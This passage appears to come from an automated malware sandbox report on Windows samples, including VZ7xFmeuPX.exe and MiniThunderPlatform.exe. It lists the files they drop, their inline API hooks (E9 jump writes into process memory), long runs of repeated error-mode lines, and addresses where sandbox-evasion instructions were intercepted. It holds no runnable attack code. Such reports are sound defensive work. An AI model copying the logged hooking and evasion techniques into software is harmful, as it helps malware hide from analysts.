Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, File created: C:\Users\user\Desktop\concrt140.dll
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, File created: C:\Users\user\Desktop\msvcp140_codecvt_ids.dll
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exe, File created: C:\Users\user\Desktop\ExuiKrnln_Win32.lib
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exe, File created: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, File created: C:\Users\user\Desktop\api-ms-win-crt-math-l1-1-0.dll
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, File created: C:\Users\user\Desktop\vcruntime140.dll
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, File created: C:\Users\user\AppData\Local\Temp\download\minizip.dll
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, File created: C:\Users\user\Desktop\msvcp140.dll
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, File created: C:\Users\user\Desktop\msvcp140_atomic_wait.dll
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe, Code function: 14_2_10059650 CreateEventA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,_CxxThrowException,GetTickCount,GetPrivateProfileIntA,GetPrivateProfileIntA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,GetPrivateProfileIntA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,GetPrivateProfileIntA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,14_2_10059650
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe, Code function: 15_2_10059650 CreateEventA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,_CxxThrowException,GetTickCount,GetPrivateProfileIntA,GetPrivateProfileIntA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,GetPrivateProfileIntA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,GetPrivateProfileIntA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,15_2_10059650

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\VZ7xFmeuPX.exe, Memory written: PID: 7288 base: 3F80005 value: E9 2B BA 6B 73
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exe, Memory written: PID: 7288 base: 7763BA30 value: E9 DA 45 94 8C
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exe, Memory written: PID: 7288 base: 3FA0008 value: E9 8B 8E 6E 73
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exe, Memory written: PID: 7288 base: 77688E90 value: E9 80 71 91 8C
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exe, Memory written: PID: 7288 base: 3FC0005 value: E9 8B 4D 0A 73
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exe, Memory written: PID: 7288 base: 77064D90 value: E9 7A B2 F5 8C
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exe, Memory written: PID: 7288 base: 3FD0005 value: E9 EB EB 0A 73
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exe, Memory written: PID: 7288 base: 7707EBF0 value: E9 1A 14 F5 8C
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exe, Memory written: PID: 7288 base: 3FE0005 value: E9 8B 8A 5E 71
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exe, Memory written: PID: 7288 base: 755C8A90 value: E9 7A 75 A1 8E
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exe, Memory written: PID: 7288 base: 3FF0005 value: E9 2B 02 60 71
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exe, Memory written: PID: 7288 base: 755F0230 value: E9 DA FD 9F 8E
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, Memory written: PID: 7512 base: 3E60005 value: E9 2B BA 7D 73
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, Memory written: PID: 7512 base: 7763BA30 value: E9 DA 45 82 8C
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, Memory written: PID: 7512 base: 3FC0008 value: E9 8B 8E 6C 73
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, Memory written: PID: 7512 base: 77688E90 value: E9 80 71 93 8C
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, Memory written: PID: 7512 base: 41C0005 value: E9 8B 4D EA 72
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, Memory written: PID: 7512 base: 77064D90 value: E9 7A B2 15 8D
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, Memory written: PID: 7512 base: 41D0005 value: E9 EB EB EA 72
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, Memory written: PID: 7512 base: 7707EBF0 value: E9 1A 14 15 8D
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, Memory written: PID: 7512 base: 41E0005 value: E9 8B 8A 3E 71
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, Memory written: PID: 7512 base: 755C8A90 value: E9 7A 75 C1 8E
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, Memory written: PID: 7512 base: 41F0005 value: E9 2B 02 40 71
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, Memory written: PID: 7512 base: 755F0230 value: E9 DA FD BF 8E
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\VZ7xFmeuPX.exe API/Special instruction interceptor: Address: 2AFCCF1
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exe API/Special instruction interceptor: Address: 28F988F
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exe API/Special instruction interceptor: Address: 2A4A5F3
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exe API/Special instruction interceptor: Address: 2913477
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exe API/Special instruction interceptor: Address: 28F644B
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exe API/Special instruction interceptor: Address: 22C49B3
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exe API/Special instruction interceptor: Address: 2931C48
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exe API/Special instruction interceptor: Address: 2B18234
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe API/Special instruction interceptor: Address: 28F988F
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe API/Special instruction interceptor: Address: 2AAF42F
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe API/Special instruction interceptor: Address: 298651D
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe API/Special instruction interceptor: Address: 2A52B72
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe API/Special instruction interceptor: Address: 294CDBA
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe API/Special instruction interceptor: Address: 2931C48
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe API/Special instruction interceptor: Address: 2AB86CF
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe API/Special instruction interceptor: Address: 6C8AD8A2
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe API/Special instruction interceptor: Address: 6C8C8EA5
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe API/Special instruction interceptor: Address: 6C8FABCF
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe API/Special instruction interceptor: Address: 6CB8B4FF
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe API/Special instruction interceptor: Address: 6CB1335C
